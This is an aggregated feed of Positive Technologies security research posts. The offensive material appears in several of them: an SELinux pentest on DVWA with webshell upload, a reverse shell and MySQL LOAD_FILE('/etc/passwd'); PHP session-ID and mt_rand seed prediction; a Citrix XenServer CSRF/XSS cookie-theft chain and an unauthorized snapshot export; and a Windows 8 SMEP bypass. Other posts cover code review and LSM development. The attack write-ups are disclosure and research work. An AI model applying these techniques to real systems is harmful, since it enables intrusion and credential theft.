Quantcast
Channel: Positive Technologies - learn and secure
Viewing all 198 articles
Browse latest View live

SELinux in Practice: DVWA Test

$
0
0
Since the last article on SELinux came out, we’ve been receiving requests to prove the benefits of the security subsystem ‘in practice'. So, we decided to test it. We created infrastructure with three vulnerable machines with default configurations (Damn Vulnerable Web Application on CentOS 5.8). They differed only in SELinux configurations: it was disabled on the the first machine, while the other two had the out-of-box policies applied, namely, targeted and strict.

Composed this way, the site of the virtual machines was exposed to penetration testing. Let’s take a look at the results!

Let’s consider the host settings first. The samples were created in CentOS 5.8 ‘lighted’ with a LAMP. When setting the hosts, I tried to make all possible mistakes typical of users: establishing connection to database with superuser privileges and applying default settings wherever was possible. It was meant to recreate three probable courses of events diverging from the same starting point.

The initial server is an Apache embraced by Red Hat (almost like Little Red Ridinghood), dressed in all sorts of new outfit from the yum utility. Of course, this tale has Granny as well: each host has an MySQL database. This wonderful company wouldn’t be full without extremely vulnerable Wolf — Damn Vulnerable Web Application — that can lead us to almost all other characters. However, on two servers, there is an armed Hunter await for hackers — SELinux, that won’t hesitate to shoot off Wolf’s all limbs once it spots any suspicious activity.

SELinux is disabled on the insecure server. This is a standard recommendation suggested in the instructions on the Site-That-Must-Not-Be-Named. Everything is in its place, HTTP and MYSQLD have defult settings. So, there is no extra defence on the host and everything depends only on resilience of the services.

To protect the second server, I opted for SELinux with the targeted policy. Nobody made any changes to it: the ‘out-of-box’ solution was exactly the way the vendor sells it. The services started in the predetermined domains and behave according to their ‘standard functionality’— as the Red Hat engineers see it.

The last configuration is a ‘strict’ SELinux policy that, according to the vender’s plan, acts on the white-list principle. Everything is forbidden which is not allowed. I tried to secure the file system with the required contexts setting only minimum privileges. This configuration ensures quite a high security level without going to the extremes.

I asked my colleague from Positive Technologies (he goes under the name of ki11obyte on Habrahabr) to do the penetration testing. That’s what he tells about it:

Let’s start with the machine that has SELinux disabled on it.The server was labled as vulnerable from the start, so it wasn’t difficult to get the webshell.

We have a form for uploading images to the server that checks only the Content-Type field of the query. Upload a PHP webshell by replacing the Content-Type (in this case, using BurpSuite) to image/jpeg.


The shell gets checked and uploaded to the server.


The confugired SELinux also failed to protect the system in this case.

Then we need to execute the webshell. To do it, let’s find a vulnerable script that allow uploading other scripts.


The file is successfully installed on each of the machines. Hence, SELinux does not protect us from errors in web applications.

Now we can easily execute commands via the uploaded webshell. 


Or we can use reverse connection to get more familiar console.


Now it’s the turn of the machine with enabled SELinux.We get the webshell again — and this time feel a touch of disappointment: not enough privileges to create sockets and even to execute ls.

  

However, despite the absent possibility of derictory listing, we can view the files.


By the way, we managed to perform the listing by means of PHP.


Besides, we were able to creae a file, make it executable and execute.


Next step was to hijack the DBMS. Via the webshell we peep at a MySQL configuration file of the web application and use it to establish connection.
The SELECT LOAD_FILE(‘/etc/passwd’) request allows viewing files. Also, we easily save the file to the temporary catalog: SELECT 1 INTO OUTFILE '/tmp/ololo'. What really struck us as odd was quite untrivial privileges for the created file.


The machine with enabled and configured SELinux was no different, which was a bit disappointing.


The experiment led us to the following conclusions. First of all, I was wrong about the vulnerable application I had chosen: DVWA is a bad match for SELinux. Most ‘vulnerabilities’ provide access to data that is accessible via the HTTPD_T domain anyway. As the result, it remains unclear how we could help poor Little Red Ridinghood (Red Hat) and the yielding Apache. The only reasonable choice was to restrict access to most binary files and prohibit reverse connection. In the rest of the cases, the attacker’s actions were beyond the competence of the security subsystem with standard configuration.

Secondly, it became absolutely clear that setting SELinux for a web project is a time consuming challenge that requires good knowledge and constant efforts. Note, that I’m not talking about some ‘ordinary security of a web server’ but a solid security of the entire project. It’s possible to work out your own policy of interaction between the contexts, but it doesn’t seem reasonable. My personal opinion is that in this case much depends on correct settings of PHP and HTTPD and regular updates.

So, SELinux, at least, can record suspicious activity in the system. And if you bother to configure it carefully, it will be able even to stop unauthorized actions. Unfortunately, it won’t be able to protect your web ptoject from code errors or misconfiguration.

Author: Kirill Ermakov, Positive Research

Positive Technologies Became Cisco’s Official Technology Partner

$
0
0
Cisco Systems has awarded Positive Technologies the status of Cisco Registered Developer. It’s notable that our company has become the first Russian company to be granted the status of Cisco Registered Developer. Now Positive Technologies has its own profile on the official web site of Cisco Systems.


This status evidences the new level of cooperation between the two companies. It gives researchers of Positive Technologies expanded access to special development resources: software, updates and documentation. Besides, it grants the right to create special tickets concerning the development issues to Cisco TAC (Technical Assistance Center). With these opportunities in hands, specialists of Positive Technologies will be able to improve the support for Cisco products implemented in the MaxPatrol Vulnerability and Compliance Management System.

The official technology partnership is logical step that gives a legal form to the long-lasting collaboration between the companies.Back in 2009, Positive Technologies’ Max Patrol was integrated with Cisco MARS, which monitors and analyzes information security events in corporate information systems and urgently responses to any incidents.

This year, MaxPatrol was enhanced with support for Cisco Nexus switches. Specialists at the Russian office of Cisco Systems provided Positive Technologies with their assistance, granting access to the required equipment.

Experts of Positive Research will continue their work on advancing security of network devices. Together with equipment from Cisco Systems, MaxPatrol already supports appliances from other vendors: Juniper, Nortel, Check Point, Huawei, Arbor Networks, D-Link. No doubts, the list will be expended. Every year the intensive work of the Positive Research center helps detect over 100 vulnerabilities in various systems and applications.



Code Review Implemented into Development

$
0
0
Attention! This article is meant for those people, who have an idea of what a code review is and who want to implement this technology in their companies.




When we started implementing code reviews in our projects, we were disappointed by the lack of good materials related to the process organizing from the very beginning. One more aspect that has hardly ever been described is review scaling.

Filling this gap in, we want to share our experience in implementing this wonderful practice by our team. Constructive comments are welcome.

So let's get it started.

What is it for?

First of all let's define goals we want to achieve reviewing a code. Of course these goals differ in case of each project and project team. They are influenced by a project character (either one-time or long-term), lifetime (short or long maintenance cycle), and etc. The following goals are the most important to us:

  1. Decreasing number of defects, detected by our colleagues from the software quality control department and by company's clients.
  2. Reducing an application maintenance cost due to increase of code quality.
  3. Securing quality and quantity of unit tests.
  4. Securing joint code ownership.
  5. Securing experience interchange among team members.
  6. Perfecting a code style. Detecting and discussing style controversies within the team.

Who participates in a review?

Let's define several terms that will be used within the topic.

Author is a code developer.

Reviewer is a developer responsible for all changes getting into a particular module or a path in a project branch.

Observer is a developer employed as an expert.

When to review?

Now let's define a place of code reviews in the development process, time of reviews: either before adding a code to a repository (pre-commit) or after adding (post-commit). The choice should be made very carefully, because implementation of code reviews is often quite delicate. Those teams, in which private code ownership prevails (and it happens pretty often), are exposed to the risk most of all. That is why it is reasonable to implement post-commit reviews at first to minimize the risk of failure to meet the project deadlines due to inevitable "holy wars" so common in the beginning. As the participants of a project team gather necessary experience, pre-commit reviews can be implemented.


It is worth noting that we chose pre-commit reviews at first.

How does it work?

A developer, creating a review, adds the following participants:

  1. a reviewer of their group;
  2. a lead of their group.

The group lead assigns observers from the number of group leads, which modules have been changed.
The group leads assign reviewers from their groups.


Such an approach secures decentralized appointment of review participants and scales perfectly both vertically (in hierarchy) and horizontally (upon increase in number of project groups).
What is needed for implementation?

Several terms should be complied with to implement code reviews successfully.


  • Before a code is added to a repository, it is surely reviewed by at least one person, who knows it well.
  • Developers always know about any changes introduced into their projects by other groups.
  • A group lead knows everything what the group does and gets a good overview of any code of the group.
  • Within a group, developers have sufficient knowledge of a code written by their colleagues.
  • If these terms are complied with, project participants achieve a good level of collective code ownership.

This is it, I think :)

If the IT community is interested in the topic of a code review and description of our experience, then we’ll dedicate one of our next articles to automation of reviews using SmartBear's CodeCollaborator.


Thank you for attention!

Practical Example of Code Review Implementation

$
0
0

Our previous post concerning a code review implemented by our company caused a particular interest of the IT community, so we decided to write an extra article on this theme. Today we'll consider this practice implementation in terms of a specific example.

Let's consider code review implementation as exemplified by a project and project team structure. There are two groups in the team: one consists of two developers and a lead, and the other – of three developers and a lead. The developers will be marked as D (Developer) and the leads as L (Lead).

Let's define the group members.

Group 1: D_1_1, D_1_2, D_1_3, L_1.
Group 2: D_2_1, D_2_2, L_2.

We assign reviewers to the project trunk.


trunk/module_1 — group 1 is responsible.
trunk/module_2 — group 2 is responsible.
trunk/common — common responsibility of both groups, a lead appoints particular reviewers from his or her own group members.

A developer writes a code affecting both groups' modules


1. Developer D_1_2 solves a task and at the same time writes a code affecting the following paths: trunk/module_1/dev_1_1, trunk/module_2/dev_2_3.

2. D_1_2 creates a review and adds the following participants.


3. Lead L_2 appoints developer D_2_3 as a reviewer.

4. The final table of the review participants looks as follows.


A developer writes a code to a common module  


1. Developer D_1_2 solves a task and at the same time writes a code to trunk/common.

2. D_1_2 creates a review and adds the following participants.


3. Lead L_1 appoints oneself as a reviewer.

4. Lead L_2 appoints developer D_2_1 as a reviewer.

5. The final table of the review participants looks as follows.


It is important to realize that launching a code review within a small group comprising 6-7 developers is one thing, and scaling a huge project developed by dozens of specialists is absolutely another thing. Huge projects have many more hidden rocks, which are just not seen in smaller-scale projects — do not forget about it.

The next article (as we promised in the previous topic) will be dedicated to review automation using CodeCollaborator.

Bye for now!

Not So Random Numbers. Take Two

$
0
0
George Argyros and Aggelos Kiayias have published recently an awesome research concerning attacks on pseudo random generator in PHP. However, it lacked practical tools implementing this attack. That is why we conducted our own research which led to the creation of a program to perform the bruteforce of PHPSESSID.

How can we get mt_rand seed via PHPSESSID?


PHPSESSID is generated this way:

md5( client IP . timestamp . microseconds1 . php_combined_lcg() )
  • client IP is known to the attacker;
  • timestamp is known through Date HTTP-header;
  • microseconds1 – a value from 0 to 1000000;
  • php_combined_lcg() – an example value is 0.12345678.

To generate php_combined_lcg(), two seeds are used:

S1 = timestamp XOR (microseconds2 << 11)
S2 = pid XOR (microseconds3 << 11)
  • timestamp is the same;
  • microseconds2 is greater than microseconds1 (when the first time measurement was made) by 0–3;
  • pid is the id of the current process (0–32768, 1024–32768 on Unix);
  • microseconds3 is greater than microseconds2 by 1–4.

The greatest entropy is contained in microseconds1, however with the use of two techniques it can be substantially reduced.

Adversarial Time Synchronization


The technique is aimed at sending pairs of requests so that to determine the moment when the second in the Date HTTP header changes.

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2012 06:05:14 GMT

HTTP/1.1 200 OK
Date: Wed, 08 Aug 2012 06:05:15 GMT

If it happened, the microseconds between our requests zeroed. By sending requests with dynamic delays it is possible to synchronize local value of microseconds with the server one.

Request Twins


The principle of this technique is simple. The attacker needs to send two requests: the first one — to reset their own password and the second one — to reset that of an administrator. The gap between microseconds will be minimal.

To sum up, an MD5 PHPSESSID hash is bruteforced for microseconds, the deltas of subsequent time measurements, and pid. As for pid, the authors have not mentioned such a great helper as Apache server-status which reveals among other information the pids of the processes which serve the requests.

To realize the bruteforce, a module for the popular program PasswordsPro has been initially created. However, this solution made it impossible to take into account the positive linear correlation between deltas of microseconds, so it bruteforced the full range of values. The speed was about 12 million hashes per second.

That is why we created our own GUI application for this task.


The speed is about 16 million hashes per second, seed calculation takes less than an hour on 3.2 GHz Quad Core i5.

Having pid and php_combined_lcg one can compute the seed used in mt_rand. It is generated this way:

(timestamp x pid) XOR (106 x php_combined_lcg())

Besides, php_combined_lcg is used as additional entropy for the uniqid function (if it is called with the second argument being true).

So, if a web application uses standard PHP sessions, it is possible to obtain the random numbers generated via mt_rand(), rand(), and uniqid().

How can we get mt_rand seed through one of the random numbers leakage?

The seed used for mt_rand is an unsigned integer 2^32. If a random number leaked, it is possible to get the seed using PHP itself and rainbow tables. It takes less than 10 minutes.
The scripts to generate rainbow tables, search the seed, and ready-made tables are available here: http://www.gat3way.eu/poc/mtrt/


What to look for in the code?

All the mt_rand(), rand(), uniqid(), shuffle(), lcg_value(), etc. The only secure function is openssl_random_pseudo_bytes(), but it is rarely used in web applications. The main ways of defense against such attacks are the following:

  • MySQL function RAND() — it can be also predicted though.
  • Suhosin patch — does not patch mt_srand, srand. The Suhosin extension should also be installed.
  • /dev/urandom — the securest way.



Arseny Reutov
Timur Yunusov
Dmitry Nagibin

Writing Linux Security Module

$
0
0
Linux Security Modules (LSM) is a framework allowing Linux to support various security models. LSM has been a part of the kernel starting with Linux v. 2.6. Currently, the official kernel hosts such security modules as SELinux, AppArmor, Tomoyo, and Smack.

The modules run simultaneously with the native Linux security model Discretionary Access Control (DAC). LSM checks are triggered by the actions allowed by DAC.

The LSM mechanism can be implemented in various ways. Generally, it is adding mandatory access control (as, for example, in SELinux case). Besides you can invent your own security model and implement it as a module using the framework. As an example let's consider implementation of a module that will grant privileges on system actions if a specific USB device is connected.

Let's take a look at the diagram and try to understand the way the LSM hook works (using the system call open as an example).


Nothing extraordinary. LSM’s main purpose is to provide security modules with a mechanism to control access to kernel objects (hooks are inserted into the kernel code right before object calls). Before the kernel addresses an internal object, a check function provided by LSM is called.

In other words, LSM allows the modules to understand whether subject S is allowed to perform action OP over kernel's internal object OBJ.
This is really great.

It is reasonable to write a security module skeleton at first. It will be very modest and will always agree with DAC. The source codes we require are located in the security directory among the kernel source codes.

Digging the sources


Go to include/linux/security.h (my kernel version is 2.6.39.4). The most important thing here is the huge structure security_ops.
Here is its fragment:
struct security_operations 
{
char name[SECURITY_NAME_MAX + 1];

int (*ptrace_access_check) (struct task_struct *child, unsigned int mode);
         int (*ptrace_traceme) (struct task_struct *parent);
int (*capget) (struct task_struct *target,
            kernel_cap_t *effective,
            kernel_cap_t *inheritable, kernel_cap_t *permitted);};
It is a list of predefined and documented callback functions available for security module checks. By default, these functions usually return 0, thus allowing any actions. However, some of them use the POSIX security module. These are the Common Capabilities functions, which you can  review in the security/commoncap.c file.

In this case we are interested in the following function from include/linux/security.c:

/**
 * register_security – registers the security module with the kernel.
 * @ops: a pointer to the structure security_options that will be used. 
 *
 * This function allows a security module to register itself with the
 * kernel security subsystem.  Some rudimentary checking is done on the @ops
 * value passed to this function. You'll need to check first if your LSM
 * is allowed to register its @ops by calling security_module_enable(@ops).
 *
 * If the security module has been already registered with the kernel, an error
 * will be returned. In case of success, 0 will be returned
 */
int __init register_security(struct security_operations *ops) 
{
    if (verify(ops)) 
        {
        printk(KERN_DEBUG "%s could not verify "
               "security_operations structure.\n", __func__);
        return -EINVAL;
    }

    if (security_ops != &default_security_ops)
        return -EAGAIN;

    security_ops = ops;

    return 0;
}

Writing the skeleton


I have BackTrack 5 R1 (kernel version 2.6.39.4) at hand. Let's consider a ready security module, for example, SELinux (the /security/selinux/ directory). Its main mechanism is described in the hooks.c file. Basing on this file, I have created the skeleton of a new security module (a little bit later we'll make something interesting out of it).

We fill the monstrous structure of security_ops with pointers to our functions. You only have to replace SELinux with the name of your module (in my example it is PtLSM) for all the functions. Then edit the bodies of all the functions: those that return void should be empty and those that return int should return 0. As a result we have LSM that does nothing and allows everything that the native security mechanism allows (the module source code: pastebin.com/Cst0VVQh).

Here is a little and sad digression. For security reasons, the kernel ceased to export characters necessary for writing security modules in the form of loadable kernel modules (Linux Kernel Module, LKM) starting with version 2.6.24. For instance, the function register_security, which allows registering a module and its hooks, was removed from export. That is why we are going to compile the kernel with our own module.

Create a directory with the name of the module PtLSM: /usr/src/linux-2.6.39.4/security/ptlsm/.
To build the module, perform the following actions:

1. Create Makefile:

obj-m := ptlsm.o

2. Create Kconfig:

config SECURITY_PTLSM
bool «Positive Protection»
default n
help
This module does nothing in a positive kind of way.

If you are unsure how to answer this question, answer N.

3. Edit /security/Makefile and /security/Kconfig to make the new module known all over the world. Add strings as in other modules.

My files with added PtLSM:
1) Makefile — pastebin.com/k7amsnQK
2) Kconfig — pastebin.com/YDsPBGAz

Then make menuconfig in the directory with the kernel source codes, choose PtLSM among the Security Options.



Now make, make modules_install, and make install. The module is placed in the kernel, and using the dmesg utility you can check what the module records to the log.

Writing a super cool module


It is time to make our module incredibly cool! Let the module disable any actions on the computer, if a USB device with a defined Vendor ID and Product ID is not connected to it (I use IDs of Galaxy S II as an example).


I have changed the body of the function ptlsm_inode_create, which checks whether this or that process can create files. If the function finds the device of ‘the supreme power,’ then it will allow execution. Similar checks can be performed for any other actions.
static int ptlsm_inode_create(struct inode *dir, struct dentry *dentry, int mask)
static int ptlsm_inode_create(struct inode *dir, struct dentry *dentry, int mask)
{
    if (find_usb_device() != 0)
    {
        printk(KERN_ALERT "You shall not pass!\n");
        return -EACCES;
    }
    else {
        printk(KERN_ALERT "Found supreme USB device\n");
    }

    return 0;
}
Now would be useful to write the find_usb_device function. It will analyze all USB devices in the system and choose the one with the necessary ID. Information about USB devices is stored in the form of trees, the roots of which are called root hub devices. The list of all the roots is in usb_bus_list.
static int find_usb_device(void)
{
    struct list_head* buslist;
    struct usb_bus* bus;
    int retval = -ENODEV;

    mutex_lock(&usb_bus_list_lock);

    for (buslist = usb_bus_list.next; buslist != &usb_bus_list; buslist = buslist->next) 
    {
        bus = container_of(buslist, struct usb_bus, bus_list);
        retval = match_device(bus->root_hub);
        if (retval == 0)
        {
            break;
        }
    }    

    mutex_unlock(&usb_bus_list_lock);
    return retval;
}
And finally let’s consider the function match_device which checks Vendor ID and Product ID.

static int match_device(struct usb_device* dev)
{
    int retval = -ENODEV;
    int child;

    if ((dev->descriptor.idVendor == vendor_id) &&
        (dev->descriptor.idProduct == product_id)) 
    {
        return 0;
    }

    for (child = 0; child < dev->maxchild; ++child) 
    {
        if (dev->children[child]) 
        {
            retval = match_device(dev->children[child]);
            if (retval == 0)
            {
                return retval;
            }
        }
    }

    return retval;
}

Let's add a few headings to work with USB.

#include <linux/usb.h>
#include <linux/usb/hcd.h>

Repeat the actions to insert the module. And buy a cool cell phone, to use your computer.


Author: Dmitry Sadovnikov, Positive Research.

Gaining Control Over Cloud Infrastructure. Easy as One, Two, Three

$
0
0
Several months ago the Positive Research Center analyzed security of Citrix XenServer. Among other things, we studied the security of administration interfaces, and web interfaces of various system components in particular. As a result, we managed to find several critical vulnerabilities, which allow obtaining control not only over these components but over the master server as well, that is over the whole cloud infrastructure. The Citrix company was immediately notified of the detected vulnerabilities. After the issues had been fixed ([1], [2], [3]), the results were disclosed at the Positive Hack Days forum as part of the FastTrack section.

So let's get down to business.
While analyzing, we focused on three components of Citrix XenServer:

  1. Web Self Service — a web based virtual machine management console.
  2. vSwitch Controller — a web console for virtual network infrastructure management.
  3. License Administration Console — XenServer license management service.

We tested the latest (at the moment of the research) version of XenServer (6.0.0).

Web Self Service


This component is a web based virtual machine management console.
As in all other modules, we detected a common set of web vulnerabilities:

  • Cross-site request forgery (CSRF);
  • Cross-site scripting (stored XSS);
  • URL redirector abuse;
  • HTTP response splitting.

All forms of the application were exposed to CSRF, a lot of fields were not properly filtered, what made stored XSS possible. Moreover, on the system logon page, we detected a very "useful" parameter, allowing URL redirector abuse and HTTP response splitting. The video demonstrates the automated exploit in action. The exploit obtains an administrator cookie via the first three vulnerabilities and then covers its tracks.
  1. At first we redirect the administrator to a specially crafted page using URL redirector abuse.
  2. The page script via CSRF creates a new system account. The user name field contains a stored XSS vulnerability. We inject useful JavaScript load to the page with a user list by exploiting the vulnerability and redirect the administrator there.
  3. The injected JavaScript code sends the administrator cookie to our server and then removes the account that has just been created.


vSwitch Controller


This component was the most interesting. The following vulnerabilities were detected in it:

  • Cross-site request forgery (CSRF);
  • URL redirector abuse;
  • HTTP response splitting;
  • Insufficient authorization.

vSwitch Controller web interface uses REST API for server communication. It means that for each user's action an HTTP request is generated. Depending on user privileges he or she is either allowed or not allowed to execute specific requests.

Moreover, the web interface of the vSwitch Controller allows an administrator to make configuration snapshots. Only privileged users should have the right to download these snapshots. However, it turned out that a user with read-only permissions also can download a snapshot, manually crafting a request to REST API.

GET /ws.v1/nox/snapshot//export

is substituted for the identifier of a snapshot that, which should be downloaded.
You can receive the list of all snapshots and their identifiers sending the following request:

GET /ws.v1/nox/snapshot/

The snapshot contains all vSwitch controller parameters, data of the vSwitch Controller users (account names and password hashes with salt), server SSL certificate together with a private key and plain-text credentials of the master server privileged user. You can connect via SSH to the main server of XenServer using these credentials and obtain control over the whole XenServer infrastructure. Once the access is gained, attackers’ possibilities are limited only by their imagination.

It is difficult to exploit this vulnerability as it is, because it requires privileges of a user with read-only permissions. However, the CSRF vulnerability comes to help. It allows an attacker to create a necessary account with a known password and stay unnoticed by the administrator (you only need to trick the administrator into following a phishing link).



License Administration Console


This component is meant for license management and based on Flexera Software's free license server manager lmadmin. We managed to detect the following vulnerabilities:

  • Content spoofing;
  • Cross-site scripting (stored XSS);
  • Cross-site request forgery (CSRF);
  • Denial of service.
Reviewing the links, you can find out that the main page of the site has an interesting GET parameter – admin, which determines the address of the link to the administrator section. The value is filtered in such a way that full XSS attack is impossible, but nothing can prevent you from slipping a link to an arbitrary resource. Denial of Service can be conducted by sending only one HTTP request, in which one of the parameters is transferred as an array, for instance:

?admin[]=blah

Besides the attacker does not need to be authorized in the system. The reason is an uncaught exception if an array is transferred as a script parameter. That is why we failed to execute arbitrary code exploiting this vulnerability.

It is worth noting that the latest (at that moment) version of lmadmin already did not contain these vulnerabilities.



Finally, the following conclusion can be made: vulnerabilities ranked according to their severity as not critical should not be ignored. When applied together, several simple vulnerabilities can be exploited for conducting an attack, in the result of which an attacker will get full control over the system. Such scenarios have been successfully implemented many times (including pentesting).

No product is secured against defects; vulnerabilities have always existed and will never disappear. And it is great if vendors quickly address security issues and provide patches promptly as it happened this time, but, unfortunately, this case is not a rule.

However, risks can be mitigated. Almost all abovementioned flaws can be eliminated, if additional measures to limit access to the XenServer administration interfaces are taken. Moreover, a lot of these vulnerabilities can be triggered off by a simple CSRF attack. Increase your vigilance, especially dealing with suspicious links.

Author: Maxim Tsoy, Positive Research

Vulnerabilities in Android Devices Allowed Stealing Money and Passwords

$
0
0
Artem Chaykin, an expert at the Positive Research Center, has discovered two critical vulnerabilities in Chrome for Google Android. The vulnerabilities threatened the security of the majority of new smartphones and tablets, since Chrome is the main web browser of the system starting from Android 4.1 (Jelly Bean).

By exploiting the first of the said vulnerabilities, an attacker could get access to user data stored in Google Chrome, including clickstream, cookies, web cashe, etc.

The other vulnerability allowed executing arbitrary JavaScript code in arbitrary site security context. It is a matter of the Universal Cross-Site Scripting. By conducting the attack a cybercriminal could, for example, compromise a bank account of a mobile bank user and steal the money
.
Thanks to Google’s professional approach, the vulnerabilities in Chrome for Android have been promptly fixed. To eliminate the defects in the browser security system, the user should install a new version of Chrome.

By the way, in 2010 names of several experts of Positive Technologies were placed in Google Security Hall of Fame. In spring 2012 the Positive Technologies expert Dmitry Serebryannikov found a critical vulnerability in the corporation’s site and won an award as part of the Vulnerability Reward Program.


Intel SMEP overview and partial bypass on Windows 8

$
0
0

Author: Artem Shishkin


English whitepaper (PDF): here
Russian whitepaper (PDF): here




1.    Introduction


        With a new generation of Intel processors based on the Ivy Bridge architecture a new security feature has been introduced. It is called SMEP which stands for “Supervisor Mode Execution Prevention”. Basically it prevents execution of a code located on a user-mode page at a CPL = 0. From an attacker’s point of view this feature significantly complicates an exploitation of kernel-mode vulnerabilities because there’s just no place for a shellcode to be stored. Usually while exploiting some kernel-mode vulnerability an attacker would allocate a special user-mode buffer with a shellcode and then trigger vulnerability gaining control of the execution flow and overriding it to execute prepared buffer contents.
        So if an attacker is unable to execute his shellcode, the whole attack is meaningless. Of course, there are some other techniques like return-oriented programming available to exploit vulnerabilities with effective payload. But there are also certain cases when the execution environment allows bypassing the security features when it is not properly configured. Let’s take a closer look to this technology and its software support by Windows 8 operating system which introduces SMEP support.



2.    Hardware support of SMEP


        This section includes an overview of SMEP hardware support.
        SMEP is a part of a page-level protection mechanism. In fact it uses the already existing flag of a page-table entry - the U/S flag (User/Supervisor flag, bit 2). This flag indicates whether a page is a user-mode page, or a kernel-mode. The page’s owner flag defines if this page can be accessed, that is, if a page belongs to the OS kernel which is executed in a supervisor mode, it can’t be accessed from a user-mode application.
        
        SMEP is enabled or disabled via CR4 control register (bit 20). It slightly modifies the influence of the U/S flag. Whenever the supervisor attempts to execute a code located on a page with the U value of this flag, indicating that this is a user-mode page, a page fault is generated by the hardware due to the violation of an access right (the access rights are described in Volume 3, chapter 4.6 [1]).
        
        As you can see, it doesn’t generate #GP but #PF instead, so the software has to process SMEP mechanism violation in a page-fault handler. We’ll use this point later when analyzing software support of this mechanism.


3.    Software support of SMEP



        SMEP support can be detected via the “cpuid” instruction. As stated in [1] the result of a “cpuid” level 7 (sublevel 0) query indicates whether the processor supports SMEP feature – the 7th bit of the EBX register has to be tested for that.

        The x64 version of Windows 8 checks SMEP feature presence during the initialization of boot structures, filling in the “KeFeatureBits” variable:

KiSystemStartup() → KiInitializeBootStructures() → KiSetFeatureBits()

The same is done on x86 version of Windows 8:

KiSystemStartup() → KiInitializeKernel() → KiGetFeatureBits()

The variable “KeFeatureBits” is then used in handling a page fault.

        If SMEP is supported on the current processor, it is enabled. On the x86 version it is enabled also during the startup, at phase 1 in the KiInitMachineDependent() function, and later it is initialized per processor core issuing an IPI which eventually calls KiConfigureDynamicProcessor() function. The same happens on the x64 OS version except of the fact that there is no KiInitMachineDependent() function.

        So, we have SMEP enabled and “KeFeatureBits” initialized at system startup. The other part of software feature support is a code of the page fault handler. A new shim function has been added in Windows 8 – MI_CHECK_KERNEL_NOEXECUTE_FAULT(). The access fault due to SMEP or NX violation is performed inside it. The result of SMEP or NX violations is a bugcheck and a blue screen of death with a code “ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY”:

KiTrap0E()/KiPageFault() → MmAccessFault() → … →
→ MI_CHECK_KERNEL_NOEXECUTE_FAULT()

The previously mentioned function is implemented in Windows 8 only.


4.    The way to bypass SMEP on Windows and its mitigation



        It is natural to conclude that if you can’t store your shellcode in the user-mode, you have to find a way to store it somewhere in the kernel space. The most obvious solution is using windows objects such as WinAPI (Events, Timers, Sections etc) or GDI (Brushes, DCs etc). They are accessed indirectly from the user-mode via WinAPI that uses system calls. The point is that the object body is kept in the kernel and somehow some object fields can be modified from the user-mode, so an attacker can transfer the needed shellcode bytes from the user-mode memory to the kernel-mode.

        It is also obvious that an attacker needs to know where the used object’s body is located in the kernel. For that, certain information disclosure is needed. As we remember a user-mode application is unable to read kernel-mode memory. Certain source of information about the kernel space is available in Windows [2].

        So it is theoretically possible to bypass SMEP on Windows due to the kernel space information disclosure. But SMEP is backed up by the fact that kernel pools where the objects are kept are now protected with NX flag (not executable) in Windows 8.

        A number of WinAPI and GDI objects have been tested for being suitable to serve as a shellcode delivery tool. WinAPI objects are stored in the paged or the non-paged pool. GDI objects are stored in the paged session pool. All of them happen to be non-executable now. Moreover, according to the results of scanning page tables, there is a miserable number of pages used from executable pools. All data buffers are now non-executable. Most of the executable (f.e. driver images) pages are not writable.

4.1.     The flaw


        As mentioned above, all of the objects in Windows 8 are now kept in non-executable pools. It is true for x64 version of Windows 8, and partially true for x86 version of Windows 8. The flaw is the paged session pool. It is marked as executable on the x86 version of Windows 8. So a suitable GDI object can be used to store the shellcode in a kernel memory.

        The most convenient object for this purpose is a GDI palette object. It is created with CreatePalette() fuction and a supplied LOGPALETTE structure. This structure contains an array of PALETTEENTRY structures that define the color and usage of each entry in the logical palette [5]. The point is that there is no parameter validation for this palette unlike the other GDI functions that create various objects. An attacker can store any colors he wants in his palette. So he can also store any shellcode bytes there. The kernel address of palette object can be revealed through the shared GDI handle table. The contents of the palette are stored within some offset (0x54 in our case). It is not nessesary to know this offset for sure because the shellcode can be stored somewhere in the middle of spreaded NOP instructions.
A schematic view of SMEP bypass is presented on Figure 1.


Figure 1. Schema of SMEP bypass in Windows 8 x86

        
A palette object provides enough space to store a big shellcode. But in fact all an attacker needs is to disable SMEP. It can be easily done by reseting 20th bit of CR4 control register and then he’ll be able to execute a shellcode stored in a user-mode memory without a size limit.

        Of course, there are some limitations when using paged session pool. Firstly, it is paged, so we need to consider IRQL when exploiting a certain kernel-mode vulnerability. Secondly, the session pool is mapped per user session, so we also have to consider the current session when exploiting kernel-mode vulnerability. And thirdly, in a multiprocessor environment control registers are duplicated per core, so an attacker has to use thread affinity to disable SMEP on a certain processor core.


4.2.     Other SMEP bypassing attack vectors


        As mentioned before, return-oriented programming can be succesfully used to bypass SMEP security feature due to the fact that this way doesn’t neccesarily have to store a custom shellcode, it uses pieces of a code that already exists somewhere in the kernel memory.
        There is also an opportunity of using custom OEM drivers which are not aware of using NX-compatible kernel pools.


5.    Conclusion


        In this paper we have reviewed the functioning of SMEP and its software support in Windows 8. We also have shown how it can be bypassed in certain cases because of a Windows kernel address space information disclosure and partial applying of security features. Still, the way SMEP is implemented in the x64 version of Windows 8 happens to be reliable and can be successfully used to prevent different attacks exploiting kernelmode vulnerabilities.

6.    Future work


        The future work is related to inspecting custom driver modules that still use executable pools and the ways of an effective kernel information disclosure that can be used for exploiting such drivers. It is considered now as the best direction of researching SMEP bypass methods.





References

[1] Intel: Intel® 64 and IA-32 Architectures Developer's Manual: Combined Volumes. Intel Corporation, 2012.
[2] Mateusz “j00ru" Jurczyk: Windows Security Hardening Through Kernel Address Protection. http://j00ru.vexillium.org/blog/04_12_11/Windows_Kernel_Address_Protection.pdf
[3] Mateusz ‘j00ru’ Jurczyk, Gynvael Coldwind: SMEP: What is it, and how to beat it on Windows. http://j00ru.vexillium.org/?p=783
[4] Ken Johnson, Matt Miller: Exploit Mitigation Improvements in Windows 8. Slides, Black Hat USA 2012.
[6] Feng Yuan: Windows Graphics Programming Win32 GDI and DirectDraw®. Prentice Hall PTR, 2000.
[7] Mark Russinovich, David A. Solomon, Alex Ionescu: Windows® Internals: Including Windows Server 2008 and Windows Vista, Fifth Edition. Microsoft Press, 2009.


Bypassing Intel SMEP on Windows 8 x64 Using Return-oriented Programming

$
0
0
Authors: Artem Shishkin, Ilya Smit (Positive Research)

This article presents a way to bypass Intel SMEP security feature on x64 version of Windows 8. It is performed by using return-oriented programming. A way to build a suitable ROP chain is demonstrated below.

